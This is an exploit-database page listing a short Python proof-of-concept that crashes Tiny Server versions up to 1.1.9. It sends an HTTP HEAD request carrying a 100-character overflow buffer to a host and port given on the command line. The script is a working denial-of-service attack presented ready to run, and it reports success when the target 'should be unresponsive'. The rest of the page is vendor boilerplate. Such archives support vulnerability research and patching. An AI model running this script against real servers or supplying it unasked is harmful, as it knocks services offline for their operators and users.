Lucene search
K

Tiny Server <= 1.1.9 HTTP HEAD DoS

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 14 Views

Overflow vulnerability in Tiny Server <= 1.1.9 (HTTP) HEAD request. Windows 7 teste

Code

                                                #!/usr/bin/python
###############################################################################
# Overflow exploiting a vulnerability in Tiny Server &#60;=1.1.9 (HTTP) HEAD request.
# Date of Discovery: 3/19/2012 (0 Day)
# Author: Brock Haun
# Vulnerable Software Download: http://tinyserver.sourceforge.net/tinyserver_full.zip
# Software Version: &#60;=1.1.9
# Target OS: Windows (Tested on Windows 7)
###############################################################################

import httplib,sys

if (len(sys.argv) != 3):
    print &#39;\n\t[*]Usage:  ./&#39; + sys.argv[0] + &#39; &#60;target host&#62; &#60;port&#62;&#39;
    sys.exit()

host = sys.argv[1]
port = sys.argv[2]
buffer = &#39;A&#39; * 100 + &#39;HTTP/1.0\r\n&#39;

print &#39;\n[*]*************************************************&#39;
print &#39;[*] Tiny Server &#60;= 1.1.0(HTTP) HEAD request overflow&#39;
print &#39;[*] Written by Brock Haun&#39;
print &#39;[*] [email protected]&#39;
print &#39;[*]*************************************************\n&#39;

try:
    print &#39;\n\t[*] Attempting connection.&#39;
    httpServ = httplib.HTTPConnection(host , port)
    httpServ.connect()
    print &#39;\n\t[*] Connected.&#39;
    print &#39;\n\t[*] Sending crash buffer.&#39;
    httpServ.request(&#39;HEAD&#39; , buffer)
    print &#39;\n\t[*] Done! Target should be unresponsive!&#39;
except:
    print &#39;\n\t[***] Connection error. Something went wrong. :(&#39;
    
httpServ.close()
sys.exit()
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
14